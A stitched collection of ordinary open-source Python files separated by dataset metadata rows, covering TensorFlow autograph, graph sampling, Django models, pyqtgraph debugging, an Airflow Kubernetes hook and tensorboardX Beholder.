node.body = self._visit_and_reindent(node.body)
return node
def visit_With(self, node):
node.body = self._visit_and_reindent(node.body)
return node
def visit_If(self, node):
node.body = self._visit_and_reindent(node.body)
node.orelse = self._visit_and_reindent(node.orelse)
return node
def visit_While(self, node):
node.body = self._visit_and_reindent(node.body)
node.orelse = self._visit_and_reindent(node.orelse)
return node
def visit_Expr(self, node):
self.generic_visit(node)
if isinstance(node.value, gast.Call):
# Patterns of single function calls, like:
# opt.minimize(loss)
# or:
# tf.py_func(...)
# First, attempt to gate future evaluation of args. If that's not
# possible, gate all remaining statements (and that may fail too, see
      # _visit_and_reindent).
args_scope = anno.getanno(node.value, NodeAnno.ARGS_SCOPE)
# NOTE: We can't guard object attributes because they may not be writable.
# In addition, avoid renaming well-known names.
# TODO(mdan): Move these names into config.
unguarded_names = (qual_names.QN('self'), qual_names.QN('tf'))
guarded_args = tuple(s for s in args_scope.used
if not s.is_composite() and s not in unguarded_names)
# TODO(mdan): Include all arguments which depended on guarded_args too.
# For example, the following will still cause a race:
# tf.assign(a, a + 1)
# b = a + 1
# tf.assign(a, a + 1) # Control deps here should include `b`
# c = b + 1
# Or maybe we should just raise an "unsafe assign" error?
if guarded_args:
# The aliases may need new names to avoid incorrectly making them local.
# TODO(mdan): This is brutal. It will even rename modules - any fix?
need_alias = tuple(
s for s in guarded_args if s not in args_scope.parent.modified)
aliased_new_names = tuple(
qual_names.QN(
self.context.namer.new_symbol(
s.ssf(), args_scope.parent.referenced)) for s in need_alias)
alias_map = dict(zip(need_alias, aliased_new_names))
if len(guarded_args) == 1:
s, = guarded_args
aliased_guarded_args = alias_map.get(s, s)
else:
aliased_guarded_args = gast.Tuple(
[alias_map.get(s, s).ast() for s in guarded_args], None)
template = """
with ag__.utils.control_dependency_on_returns(call):
aliased_guarded_args = ag__.utils.alias_tensors(guarded_args)
"""
        control_deps_guard = templates.replace(
template,
call=node.value,
aliased_guarded_args=aliased_guarded_args,
guarded_args=guarded_args)[-1]
else:
alias_map = {}
template = """
          with ag__.utils.control_dependency_on_returns(call):
pass
"""
control_deps_guard = templates.replace(template, call=node.value)[-1]
control_deps_guard.body = []
node = control_deps_guard
anno.setanno(node, anno.Basic.INDENT_BLOCK_REMAINDER,
(node.body, alias_map))
return node
# pylint:enable=invalid-name
def transform(node, context):
return SideEffectGuardTransformer(context).visit(node)
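# Illustrative effect of the transformer above (hedged sketch, assumed
# variable names): a standalone call such as
#
#   tf.assign(a, a + 1)
#   b = a + 2
#
# is rewritten roughly into
#
#   with ag__.utils.control_dependency_on_returns(tf.assign(a, a + 1)):
#     a_1 = ag__.utils.alias_tensors(a)
#     b = a_1 + 2
#
# so that the statements following the call are gated on its side effect.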
|
wenzheli/python_new
|
com/uva/network.py
|
Python
|
gpl-3.0
| 17,149
| 0.012595
|
import random
from sets import Set
class Network(object):
"""
Network class represents the whole graph that we read from the
data file. Since we store all the edges ONLY, the size of this
information is much smaller due to the graph sparsity (in general,
    around 0.1% of possible node pairs are actually linked).
We use the term "linked edges" to denote the edges that two nodes
are connected, "non linked edges", otherwise. If we just
|
say edge,
it means either linked or non-link edge.
    The class also contains the sampling methods that a sampler can utilize.
    This gives a clean separation between the learners and the data layer: by
    calling the functions of this class, each learner can get different types
    of data.
"""
def __init__(self, data, held_out_ratio):
"""
In this initialization step, we separate the whole data set
into training, validation and testing sets. Basically,
Training -> used for tuning the parameters.
        Held-out/Validation -> used for evaluating the current model and avoiding over-fitting;
        the accuracy on the validation set is used as the stopping criterion.
Testing -> used for calculating final model accuracy.
Arguments:
        data: representation of the whole graph.
        held_out_ratio: the percentage of data used for validation and testing.
"""
self.__N = data.N # number of nodes in the graph
        self.__linked_edges = data.E        # all pairs of linked edges.
self.__num_total_edges = len(self.__linked_edges) # number of total edges.
self.__held_out_ratio = held_out_ratio # percentage of held-out data size
        # Based on the a-MMSB paper, it samples an equal number of
# linked edges and non-linked edges.
self.__held_out_size = int(held_out_ratio * len(self.__linked_edges))
# it is used for stratified random node sampling. By default 10
self.__num_pieces = 10
# The map stores all the neighboring nodes for each node, within the training
# set. The purpose of keeping this object is to make the stratified sampling
# process easier, in which case we need to sample all the neighboring nodes
# given the current one. The object looks like this:
# {
# 0: [1,3,1000,4000]
# 1: [0,4,999]
# .............
# 10000: [0,441,9000]
# }
self.__train_link_map = {}
self.__held_out_map = {} # store all held out edges
self.__test_map = {} # store all test edges
# initialize train_link_map
self.__init_train_link_map()
# randomly sample hold-out and test sets.
self.__init_held_out_set()
self.__init_test_set()
def sample_mini_batch(self, mini_batch_size, strategy):
"""
Sample a mini-batch of edges from the training data.
There are four different sampling strategies for edge sampling
1.random-pair sampling
            sample node pairs uniformly at random. This method is an instance of independent
pair sampling, with h(x) equal to 1/(N(N-1)/2) * mini_batch_size
2.random-node sampling
            A set consists of all the pairs that involve one of the N nodes: we first sample one of
            the N nodes, and sample all the edges for that node. h(x) = 1/N
3.stratified-random-pair sampling
We divide the edges into linked and non-linked edges, and each time either sample
mini-batch from linked-edges or non-linked edges. g(x) = 1/N_0 for non-link and
1/N_1 for link, where N_0-> number of non-linked edges, N_1-> # of linked edges.
4.stratified-random-node sampling
            For each node, we define a link set consisting of all its links, and m non-link sets
            that partition its non-links. We first select a random node, and either select its link
set or sample one of its m non-link sets. h(x) = 1/N if linked set, 1/Nm otherwise
Returns (sampled_edges, scale)
        scale equals 1/h(x), ensuring the sampling gives unbiased gradients.
"""
if strategy == "random-pair":
return self.__random_pair_sampling(mini_batch_size)
elif strategy == "random-node":
return self.__random_node_sampling()
elif strategy == "stratified-random-pair":
return self.__stratified_random_pair_sampling(mini_batch_size)
elif strategy == "stratified-random-node":
return self.__stratified_random_node_sampling(10)
else:
print "Invalid sampling strategy, please make sure you are using the correct one:\
[random-pair, random-node, stratified-random-pair, stratified-random-node]"
return None
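    # Illustrative call (hypothetical instance and sizes, not part of the
    # original module):
    #   edges, scale = network.sample_mini_batch(50, "stratified-random-node")
    # `edges` is a Set of (i, j) node pairs and `scale` is 1/h(x), the factor
    # that keeps the mini-batch gradient estimate unbiased.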
def get_num_linked_edges(self):
return len(self.__linked_edges)
def get_num_total_edges(self):
return self.__num_total_edges
def get_num_nodes(self):
return self.__N
def get_linked_edges(self):
return self.__linked_edges
def get_held_out_set(self):
return self.__held_out_map
def get_test_set(self):
return self.__test_map
def set_num_pieces(self, num_pieces):
self.__num_pieces = num_pieces
def __random_pair_sampling(self, mini_batch_size):
"""
        Sample a list of edges from the whole training network uniformly, regardless
        of link or non-link edges. The sampling approach is pretty simple: randomly generate
one edge and then check if that edge passes the conditions. The iteration
stops until we get enough (mini_batch_size) edges.
"""
p = mini_batch_size
mini_batch_set = Set() # list of samples in the mini-batch
# iterate until we get $p$ valid edges.
while p > 0:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if firstIdx == secondIdx:
continue
# make sure the first index is smaller than the second one, since
# we are dealing with undirected graph.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# the edge should not be in 1)hold_out set, 2)test_set 3) mini_batch_set (avoid duplicate)
if edge in self.__held_out_map or edge in self.__test_map or edge in mini_batch_set:
continue
# great, we put it into the mini_batch list.
mini_batch_set.add(edge)
p -= 1
scale = (self.__N*(self.__N-1)/2)/mini_batch_size
return (mini_batch_set, scale)
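    # Worked example of the scale above (illustrative numbers): with N = 100
    # nodes and mini_batch_size = 50, scale = (100*99/2)/50 = 99, i.e. each
    # sampled pair stands in for 99 candidate pairs.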
def __random_node_sampling(self):
"""
A set consists of all the pairs that involve one of the N nodes: we first sample one of
        the N nodes, and sample all the edges for that node. h(x) = 1/N
"""
mini_batch_set = Set()
# randomly select the node ID
nodeId = random.randint(0, self.__N-1)
for i in range(0, self.__N):
# make sure the first index is smaller than the second one, since
# we are dealing with undirected graph.
edge = (min(nodeId, i), max(nodeId, i))
if edge in self.__held_out_map or edge in self.__test_map \
or edge in mini_batch_set:
continue
mini_batch_set.add(edge)
return (mini_batch_set, self.__N)
def __stratified_random_pair_sampling(self, mini_batch_size):
"""
We divide the edges into linked and non-linked edges, and each time either sample
mini-batch from linked-edges or non-linke
|
MERegistro/meregistro
|
meregistro/apps/postitulos/models/Postitulo.py
|
Python
|
bsd-3-clause
| 2,464
| 0.007323
|
# -*- coding: utf-8 -*-
from django.db import models
from apps.postitulos.models.EstadoPostitulo import EstadoPostitulo
from apps.postitulos.models.TipoPostitulo import TipoPostitulo
from apps.postitulos.models.PostituloTipoNormativa import PostituloTipoNormativa
from apps.postitulos.models.CarreraPostitulo import CarreraPostitulo
from apps.postitulos.models.AreaPostitulo import AreaPostitulo
from apps.registro.models.Nivel import Nivel
from apps.registro.models.Jurisdiccion import Jurisdiccion
import datetime
"""
Degree title in the national nomenclature (título nomenclado nacional)
"""
class Postitulo(models.Model):
nombre = models.CharField(max_length=255)
tipo_normativa = models.ForeignKey(PostituloTipoNormativa)
normativa = models.CharField(max_length=50)
carrera_postitulo = models.ForeignKey(CarreraPostitulo)
observaciones = models.CharField(max_length=255, null=True, blank=True)
niveles = models.ManyToManyField(Nivel, db_table='postitulos_postitulos_niveles')
areas = models.ManyToManyField(AreaPostitulo, db_table='postitulos_postitulos_areas')
    jurisdicciones = models.ManyToManyField(Jurisdiccion, db_table='postitulos_postitulos_jurisdicciones') # Provinces
    estado = models.ForeignKey(EstadoPostitulo) # Matches the latest state recorded in TituloEstado
class Meta:
app_label = 'postitulos'
ordering = ['nombre']
def __unicode__(self):
return self.nombre
"Sobreescribo el init para agregarle propiedades"
def __init__(self, *args, **kwargs):
super(Postitulo, self).__init__(*args, **kwargs)
self.estados = self.getEstados()
def registrar_estado(self):
from apps.postitulos.models.PostituloEstado import PostituloEstado
registro = PostituloEstado(estado = self.estado)
registro.fecha = datetime.date.today()
registro.postitulo_id = self.id
registro.save()
def getEstados(self):
from apps.postitulos.models.PostituloEstado import PostituloEstado
try:
            estados = PostituloEstado.objects.filter(postitulo = self).order_by('fecha', 'id')
except:
estados = {}
return estados
"Algún título jurisdiccional está asociado al título?"
def asociado_carrera_postitulo_jurisdiccional(self):
from apps.postitulos.models.CarreraPostituloJurisdiccional import CarreraPostituloJurisdiccional
return CarreraPostituloJurisdiccional.objects.filter(postitulo = self).exists()
|
ArteliaTelemac/PostTelemac
|
PostTelemac/meshlayerlibs/pyqtgraph/debug.py
|
Python
|
gpl-3.0
| 41,232
| 0.00827
|
# -*- coding: utf-8 -*-
"""
debug.py - Functions to aid in debugging
Copyright 2010 Luke Campagnola
Distributed under MIT/X11 license. See license.txt for more information.
"""
from __future__ import print_function
import sys, traceback, time, gc, re, types, weakref, inspect, os, cProfile, threading
from . import ptime
from numpy import ndarray
from .Qt import QtCore, QtGui
from .util.mutex import Mutex
from .util import cprint
__ftraceDepth = 0
def ftrace(func):
"""Decorator used for marking the beginning and end of function calls.
Automatically indents nested calls.
"""
def w(*args, **kargs):
global __ftraceDepth
pfx = " " * __ftraceDepth
print(pfx + func.__name__ + " start")
__ftraceDepth += 1
try:
rv = func(*args, **kargs)
finally:
__ftraceDepth -= 1
print(pfx + func.__name__ + " done")
return rv
return w
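# Illustrative usage (hypothetical function, not part of the original module):
#
#   @ftrace
#   def load(path):
#       ...
#
# Each call then prints "load start" / "load done", indented by nesting depth.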
class Tracer(object):
"""
Prints every function enter/exit. Useful for debugging crashes / lockups.
"""
def __init__(self):
self.count = 0
self.stack = []
def trace(self, frame, event, arg):
self.count += 1
# If it has been a long time since we saw the top of the stack,
# print a reminder
if self.count % 1000 == 0:
print("----- current stack: -----")
for line in self.stack:
print(line)
if event == 'call':
line = " " * len(self.stack) + ">> " + self.frameInfo(frame)
print(line)
self.stack.append(line)
elif event == 'return':
self.stack.pop()
line = " " * len(self.stack) + "<< " + self.frameInfo(frame)
print(line)
if len(self.stack) == 0:
self.count = 0
return self.trace
def stop(self):
sys.settrace(None)
def start(self):
sys.settrace(self.trace)
def frameInfo(self, fr):
filename = fr.f_code.co_filename
funcname = fr.f_code.co_name
lineno = fr.f_lineno
callfr = sys._getframe(3)
callline = "%s %d" % (callfr.f_code.co_name, callfr.f_lineno)
args, _, _, value_dict = inspect.getargvalues(fr)
if len(args) and args[0] == 'self':
instance = value_dict.get('self', None)
if instance is not None:
cls = getattr(instance, '__class__', None)
if cls is not None:
funcname = cls.__name__ + "." + funcname
return "%s: %s %s: %s" % (callline, filename, lineno, funcname)
def warnOnException(func):
"""Decorator that catches/ignores exceptions and prints a stack trace."""
def w(*args, **kwds):
try:
func(*args, **kwds)
except:
printExc('Ignored exception:')
return w
def getExc(indent=4, prefix='| ', skip=1):
lines = formatException(*sys.exc_info(), skip=skip)
lines2 = []
for l in lines:
lines2.extend(l.strip('\n').split('\n'))
lines3 = [" "*indent + prefix + l for l in lines2]
return '\n'.join(lines3)
def printExc(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented exception backtrace
(This function is intended to be called within except: blocks)"""
exc = getExc(indent, prefix + ' ', skip=2)
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
print(exc)
print(" "*indent + prefix + '='*30 + '<<')
def printTrace(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented stack trace"""
trace = backtrace(1)
#exc = getExc(indent, prefix + ' ')
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
for line in trace.split('\n'):
print(" "*indent + prefix + " " + line)
print(" "*indent + prefix + '='*30 + '<<')
def backtrace(skip=0):
return ''.join(traceback.format_stack()[:-(skip+1)])
def formatException(exctype, value, tb, skip=0):
"""Return a list of formatted exception strings.
Similar to traceback.format_exception, but displays the entire stack trace
rather than just the portion downstream of the point where the exception is
caught. In particular, unhandled exceptions that occur during Qt signal
handling do not usually show the portion of the stack that emitted the
signal.
"""
lines = traceback.format_exception(exctype, value, tb)
lines = [lines[0]] + traceback.format_stack()[:-(skip+1)] + [' --- exception caught here ---\n'] + lines[1:]
return lines
def printException(exctype, value, traceback):
"""Print an exception with its full traceback.
Set `sys.excepthook = printException` to ensure that exceptions caught
inside Qt signal handlers are printed with their full stack trace.
"""
print(''.join(formatException(exctype, value, traceback, skip=1)))
def listObjs(regex='Q', typ=None):
"""List all objects managed by python gc with class name matching regex.
Finds 'Q...' classes by default."""
if typ is not None:
return [x for x in gc.get_objects() if isinstance(x, typ)]
else:
return [x for x in gc.get_objects() if re.match(regex, type(x).__name__)]
def findRefPath(startObj, endObj, maxLen=8, restart=True, seen={}, path=None, ignore=None):
"""Determine all paths of object references from startObj to endObj"""
refs = []
if path is None:
path = [endObj]
if ignore is None:
ignore = {}
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
ignore[id(seen)] = None
prefix = " "*(8-maxLen)
#print prefix + str(map(type, path))
prefix += " "
if restart:
#gc.collect()
seen.clear()
gc.collect()
newRefs = [r for r in gc.get_referrers(endObj) if id(r) not in ignore]
ignore[id(newRefs)] = None
#fo = allFrameObjs()
#newRefs = []
#for r in gc.get_referrers(endObj):
#try:
#if r not in fo:
#newRefs.append(r)
#except:
#newRefs.append(r)
for r in newRefs:
#print prefix+"->"+str(type(r))
if type(r).__name__ in ['frame', 'function', 'listiterator']:
#print prefix+" FRAME"
continue
try:
if any([r is x for x in path]):
#print prefix+" LOOP", objChainString([r]+path)
continue
except:
print(r)
print(path)
raise
if r is startObj:
refs.append([r])
print(refPathString([startObj]+path))
continue
if maxLen == 0:
#print prefix+" END:", objChainString([r]+path)
continue
## See if we have already searched this node.
## If not, recurse.
tree = None
try:
cache = seen[id(r)]
if cache[0] >= maxLen:
tree = cache[1]
for p in tree:
print(refPathString(p+path))
except KeyError:
pass
ignore[id(tree)] = None
if tree is None:
tree = findRefPath(startObj, r, maxLen-1, restart=False, path=[r]+path, ignore=ignore)
seen[id(r)] = [maxLen, tree]
## integrate any returned results
if len(tree) == 0:
            #print prefix+"  EMPTY TREE"
continue
else:
for p in tree:
refs.append(p+[r])
#seen[id(r)] = [maxLen, refs]
return refs
def objString(obj):
"""R
|
eturn a short but descriptive string for any object"""
try:
if type(obj) in [int, float]:
return str(obj)
elif isinstance(obj, dict):
if len(obj) > 5:
return "<dict {%s,...}>" % (",".join(list(obj.keys())[:5]))
else:
return "<dict {%s}>" % (",".join(list(obj.keys())))
elif isinstance(obj, str):
if len(obj) > 50:
return '"%s..."' % obj[:50
|
classrank/ClassRank
|
classrank/grouch/grouch_util.py
|
Python
|
gpl-2.0
| 3,951
| 0.000253
|
import datetime
import json
from classrank.database.wrapper import Query
"""add_to_database.py: adds courses from Grouch to the ClassRank DB."""
def add_to_database(grouch_output, db):
"""
Add courses from Grouch's output to a db.
Keyword arguments:
grouch_output -- the output of Grouch (the scraped info)
db -- the db to add to
"""
print("Beginning Grouch parse ({}).".format(datetime.datetime.now()))
all_courses = parse(grouch_output)
print("Ending Grouch parse ({}).".format(datetime.datetime.now()))
if len(all_courses) != 0:
print("Beginning database add ({}).".format(datetime.datetime.now()))
with Query(db) as q:
school_dict = {"name": "Georgia Institute of Technology",
"abbreviation": "gatech"}
if not _school_in_database(school_dict, db, q):
q.add(db.school(**school_dict))
school_id = q.query(db.school).filter_by(**school_dict).one().uid
for course, sections in all_courses:
course_dict = {"school_id": school_id,
"name": course['name'],
"description": course['fullname'],
"number": course['number'],
"subject": course['school']}
if not _course_in_database(course_dict, db, q):
q.add(db.course(**course_dict))
course_id = q.query(db.course).filter_by(**course_dict).one().uid
for section in sections:
section_dict = {"course_id": course_id,
"semester": course['semester'],
"year": course['year'],
"name": section['section_id'],
"crn": section['crn']}
q.add(db.section(**section_dict))
print("Ending database add ({}).".format(datetime.datetime.now()))
def parse(to_read):
"""Parse Grouch output (JSON) to dictionaries, with some additions.
Keyword arguments:
to_read -- the file of Grouch output (one JSON document per line)
Return a list of tuples of (course, sections_of_course).
"""
# A mapping of semester number to string name
semester_map = {'2': 'Spring',
'5': 'Summer',
'8': 'Fall'}
all_courses = []
with open(to_read, 'r') as f:
for line in f:
course = json.loads(line)
# Extract the semester and year for easier use later
semester_token = course['semester'] # of the form yyyymm
year = semester_token[0:4]
month = semester_token[5:6]
semester = semester_map[month]
course['year'] = year
course['semester'] = semester
sections = []
if 'sections' in course: # If the course has sections
sections = course['sections']
all_courses.append((course, sections))
return all_courses
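# Example of the semester handling above (illustrative value): for a course
# with semester token '201608', year becomes '2016' and the month digit '8'
# maps to 'Fall', so the course is tagged ('2016', 'Fall').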
def _school_in_database(school_dict, db, q):
"""Check if a school is in the database.
Keyword arguments:
school_dict -- a dictionary specifying the school to check
db -- the db to search in
q -- the Query object used to query the database
Returns True if there are instances of school in database, False otherwise
"""
    return len(q.query(db.school).filter_by(**school_dict).all()) != 0
def _course_in_database(course_dict, db, q):
"""Check if a course is in the database.
Keyword arguments:
    course_dict -- a dictionary specifying the course to check
db -- the db to search in
q -- the Query object used to query the database
Returns True if there are instances of course in database, False otherwise
"""
return len(q.query(db.course).filter_by(**course_dict).all()) != 0
|
airbnb/airflow
|
airflow/providers/cncf/kubernetes/hooks/kubernetes.py
|
Python
|
apache-2.0
| 9,757
| 0.002152
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tempfile
from typing import Any, Dict, Generator, Optional, Tuple, Union
import yaml
from cached_property import cached_property
from kubernetes import client, config, watch
from airflow.exceptions import AirflowException
from airflow.hooks.base import BaseHook
def _load_body_to_dict(body):
try:
body_dict = yaml.safe_load(body)
    except yaml.YAMLError as e:
raise AirflowException("Exception when loading resource definition: %s\n" % e)
return body_dict
class KubernetesHook(BaseHook):
"""
Creates Kubernetes API connection.
- use in cluster configuration by using ``extra__kubernetes__in_cluster`` in connection
- use custom config by providing path to the file using ``extra__kubernetes__kube_config_path``
- use custom configuration by providing content of kubeconfig file via
``extra__kubernetes__kube_config`` in connection
- use default config by providing no extras
    This hook checks for configuration options in the above order. Once an option is present it will
use this configuration.
.. seealso::
For more information about Kubernetes connection:
:doc:`/connections/kubernetes`
:param conn_id: the connection to Kubernetes cluster
:type conn_id: str
"""
conn_name_attr = 'kubernetes_conn_id'
default_conn_name = 'kubernetes_default'
conn_type = 'kubernetes'
hook_name = 'Kubernetes Cluster Connection'
@staticmethod
def get_connection_form_widgets() -> Dict[str, Any]:
"""Returns connection widgets to add to connection form"""
from flask_appbuilder.fieldwidgets import BS3TextFieldWidget
from flask_babel import lazy_gettext
from wtforms import BooleanField, StringField
return {
"extra__kubernetes__in_cluster": BooleanField(lazy_gettext('In cluster configuration')),
"extra__kubernetes__kube_config_path": StringField(
lazy_gettext('Kube config path'), widget=BS3TextFieldWidget()
),
"extra__kubernetes__kube_config": StringField(
lazy_gettext('Kube config (JSON format)'), widget=BS3TextFieldWidget()
),
"extra__kubernetes__namespace": StringField(
lazy_gettext('Namespace'), widget=BS3TextFieldWidget()
),
}
@staticmethod
def get_ui_field_behaviour() -> Dict:
"""Returns custom field behaviour"""
return {
"hidden_fields": ['host', 'schema', 'login', 'password', 'port', 'extra'],
"relabeling": {},
}
def __init__(
self, conn_id: str = default_conn_name, client_configuration: Optional[client.Configuration] = None
) -> None:
super().__init__()
self.conn_id = conn_id
self.client_configuration = client_configuration
def get_conn(self) -> Any:
"""Returns kubernetes api session for use with requests"""
connection = self.get_connection(self.conn_id)
extras = connection.extra_dejson
in_cluster = extras.get("extra__kubernetes__in_cluster")
kubeconfig_path = extras.get("extra__kubernetes__kube_config_path")
kubeconfig = extras.get("extra__kubernetes__kube_config")
num_selected_configuration = len([o for o in [in_cluster, kubeconfig, kubeconfig_path] if o])
if num_selected_configuration > 1:
raise AirflowException(
"Invalid connection configuration. Options extra__kubernetes__kube_config_path, "
"extra__kubernetes__kube_config, extra__kubernetes__in_cluster are mutually exclusive. "
"You can only use one option at a time."
)
if in_cluster:
self.log.debug("loading kube_config from: in_cluster configuration")
config.load_incluster_config()
return client.ApiClient()
if kubeconfig_path is not None:
self.log.debug("loading kube_config from: %s", kubeconfig_path)
config.load_kube_config(
config_file=kubeconfig_path, client_configuration=self.client_configuration
)
return client.ApiClient()
if kubeconfig is not None:
with tempfile.NamedTemporaryFile() as temp_config:
self.log.debug("loading kube_config from: connection kube_config")
temp_config.write(kubeconfig.encode())
temp_config.flush()
config.load_kube_config(
config_file=temp_config.name, client_configuration=self.client_configuration
)
return client.ApiClient()
self.log.debug("loading kube_config from: default file")
config.load_kube_config(client_configuration=self.client_configuration)
return client.ApiClient()
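    # Illustrative connection extras for the branches above (hypothetical
    # values): {"extra__kubernetes__kube_config_path": "/opt/kube/config"}
    # selects the load_kube_config(config_file=...) branch, while an empty
    # extras dict falls through to the default kube config file.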
@cached_property
def api_client(self) -> Any:
"""Cached Kubernetes API client"""
return self.get_conn()
def create_custom_object(
self, group: str, version: str, plural: str, body: Union[str, dict], namespace: Optional[str] = None
):
"""
Creates custom resource definition object in Kubernetes
:param group: api group
:type group: str
:param version: api version
:type version: str
:param plural: api plural
:type plural: str
:param body: crd object definition
:type body: Union[str, dict]
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CustomObjectsApi(self.api_client)
if namespace is None:
namespace = self.get_namespace()
if isinstance(body, str):
body = _load_body_to_dict(body)
try:
response = api.create_namespaced_custom_object(
group=group, version=version, namespace=namespace, plural=plural, body=body
)
self.log.debug("Response: %s", response)
return response
except client.rest.ApiException as e:
raise AirflowException("Exception when calling -> create_custom_object: %s\n" % e)
def get_custom_object(
self, group: str, version: str, plural: str, name: str, namespace: Optional[str] = None
):
"""
Get custom resource definition object from Kubernetes
:param group: api group
:type group: str
:param version: api version
:type version: str
:param plural: api plural
:type plural: str
:param name: crd object name
:type name: str
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CustomObjectsApi(self.api_client)
if namespace is None:
namespace = self.get_namespace()
try:
response = api.get_namespaced_custom_object(
group=group, version=version, namespace=namespace, plural=plural, name=name
)
return response
except client.rest.ApiException as e:
raise AirflowException("Exception when calling -> get_custom_object: %s\n" % e)
def get_namespace(self) -> str:
"""Returns the namespace that defined in the connection"""
connection = self.get_connection(self.conn_id)
extras = connection.extra_dejson
namespace = extras.get("extra_
|
signaldetect/messity
|
reader/receivers/core.py
|
Python
|
mit
| 238
| 0
|
"""
Handling signals of the `core` app
"""
from django.dispatch import receiver
from core import signals
from reader import actions
@receiver(signals.app_link_ready)
def app_link_ready(sender, **kwargs):
actions.create_app_link()
| ||
artefactual-labs/agentarchives
|
setup.py
|
Python
|
agpl-3.0
| 1,074
| 0.000931
|
from setuptools import setup
setup(
name="agentarchives",
description="Clients to retrieve, add, and modify records from archival management systems",
url="https://github.com/artefactual-labs/agentarchives",
author="Artefactual Systems",
author_email="info@artefactual.com",
license="AGPL 3",
version="0.7.0",
packages=[
"agentarchives",
"agentarchives.archivesspace",
"agentarchives.archivists_toolkit",
"agentarchives.atom",
],
install_requires=["requests>=2,<3", "mysqlclient>=1.3,<2"],
python_requires=">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*",
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: GNU Affero General Public License v3",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
)
|
lanpa/tensorboardX
|
tensorboardX/beholder/beholder.py
|
Python
|
mit
| 8,355
| 0.000838
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from ..proto.summary_pb2 import Summary
from ..proto.summary_pb2 import SummaryMetadata
from ..proto.tensor_pb2 import TensorProto
from ..proto.tensor_shape_pb2 import TensorShapeProto
import os
import time
import numpy as np
# import tensorflow as tf
# from tensorboard.plugins.beholder import im_util
# from . import im_util
from .file_system_tools import read_pickle,\
write_pickle, write_file
from .shared_config import PLUGIN_NAME, TAG_NAME,\
SUMMARY_FILENAME, DEFAULT_CONFIG, CONFIG_FILENAME, SUMMARY_COLLECTION_KEY_NAME, SECTION_INFO_FILENAME
from . import video_writing
# from .visualizer import Visualizer
class Beholder(object):
def __init__(self, logdir):
self.PLUGIN_LOGDIR = logdir + '/plugins/' + PLUGIN_NAME
self.is_recording = False
self.video_writer = video_writing.VideoWriter(
self.PLUGIN_LOGDIR,
outputs=[video_writing.FFmpegVideoOutput, video_writing.PNGVideoOutput])
self.last_image_shape = []
self.last_update_time = time.time()
self.config_last_modified_time = -1
self.previous_config = dict(DEFAULT_CONFIG)
if not os.path.exists(self.PLUGIN_LOGDIR + '/config.pkl'):
os.makedirs(self.PLUGIN_LOGDIR)
write_pickle(DEFAULT_CONFIG,
'{}/{}'.format(self.PLUGIN_LOGDIR, CONFIG_FILENAME))
# self.visualizer = Visualizer(self.PLUGIN_LOGDIR)
def _get_config(self):
'''Reads the config file from disk or creates a new one.'''
filename = '{}/{}'.format(self.PLUGIN_LOGDIR, CONFIG_FILENAME)
modified_time = os.path.getmtime(filename)
if modified_time != self.config_last_modified_time:
config = read_pickle(filename, default=self.previous_config)
self.previous_config = config
else:
config = self.previous_config
self.config_last_modified_time = modified_time
return config
def _write_summary(self, frame):
'''Writes the frame to disk as a tensor summary.'''
path = '{}/{}'.format(self.PLUGIN_LOGDIR, SUMMARY_FILENAME)
smd = SummaryMetadata()
tensor = TensorProto(
dtype='DT_FLOAT',
float_val=frame.reshape(-1).tolist(),
tensor_shape=TensorShapeProto(
dim=[TensorShapeProto.Dim(size=frame.shape[0]),
TensorShapeProto.Dim(size=frame.shape[1]),
TensorShapeProto.Dim(size=frame.shape[2])]
)
)
summary = Summary(value=[Summary.Value(
tag=TAG_NAME, metadata=smd, tensor=tensor)]).SerializeToString()
write_file(summary, path)
@staticmethod
def stats(tensor_and_name):
imgstats = []
for (img, name) in tensor_and_name:
immax = img.max()
immin = img.min()
imgstats.append(
{
'height': img.shape[0],
'max': str(immax),
'mean': str(img.mean()),
'min': str(immin),
'name': name,
'range': str(immax - immin),
'shape': str((img.shape[1], img.shape[2]))
})
return imgstats
def _get_final_image(self, config, trainable=None, arrays=None, frame=None):
if config['values'] == 'frames':
# print('===frames===')
final_image = frame
elif config['values'] == 'arrays':
# print('===arrays===')
final_image = np.concatenate([arr for arr, _ in arrays])
stat = self.stats(arrays)
write_pickle(
stat, '{}/{}'.format(self.PLUGIN_LOGDIR, SECTION_INFO_FILENAME))
elif config['values'] == 'trainable_variables':
# print('===trainable===')
final_image = np.concatenate([arr for arr, _ in trainable])
stat = self.stats(trainable)
write_pickle(
stat, '{}/{}'.format(self.PLUGIN_LOGDIR, SECTION_INFO_FILENAME))
if len(final_image.shape) == 2: # Map grayscale images to 3D tensors.
final_image = np.expand_dims(final_image, -1)
return final_image
def _enough_time_has_passed(self, FPS):
'''For limiting how often frames are computed.'''
if FPS == 0:
return False
else:
